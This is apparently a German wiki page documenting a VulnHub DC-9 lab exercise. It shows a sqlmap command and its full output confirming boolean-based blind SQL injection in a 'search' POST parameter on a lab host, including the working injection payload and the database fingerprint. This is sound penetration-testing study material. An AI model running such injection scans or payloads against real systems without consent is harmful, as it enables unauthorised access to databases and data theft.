Vulnhub dc-9 sqlmap
Version vom 9. März 2023, 09:03 Uhr von Thomas.will (Diskussion | Beiträge)
Testen ob die Boolean Blind Schwäche vorhanden ist
- sqlmap -u "http://10.0.10.58/results.php" --data="search=Mary" --technique=B
___
__H__
___ ___[.]_____ ___ ___ {1.7.2#stable}
|_ -| . [,] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 10:00:30 /2023-03-09/
[10:00:30] [INFO] testing connection to the target URL
[10:00:30] [INFO] testing if the target URL content is stable
[10:00:30] [INFO] target URL content is stable
[10:00:30] [INFO] testing if POST parameter 'search' is dynamic
[10:00:30] [INFO] POST parameter 'search' appears to be dynamic
[10:00:30] [WARNING] heuristic (basic) test shows that POST parameter 'search' might not be injectable
[10:00:30] [INFO] testing for SQL injection on POST parameter 'search'
[10:00:30] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[10:00:30] [INFO] POST parameter 'search' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="CEO")
[10:00:30] [INFO] heuristic (extended) test shows that the back-end DBMS could be 'MySQL'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]
[10:00:32] [INFO] checking if the injection point on POST parameter 'search' is a false positive
POST parameter 'search' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 18 HTTP(s) requests:
---
Parameter: search (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: search=Mary' AND 8710=8710 AND 'yHal'='yHal
---
[10:00:35] [INFO] testing MySQL
[10:00:35] [INFO] confirming MySQL
[10:00:35] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 10 (buster)
web application technology: Apache 2.4.38
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
[10:00:35] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/10.0.10.58'
[*] ending @ 10:00:35 /2023-03-09/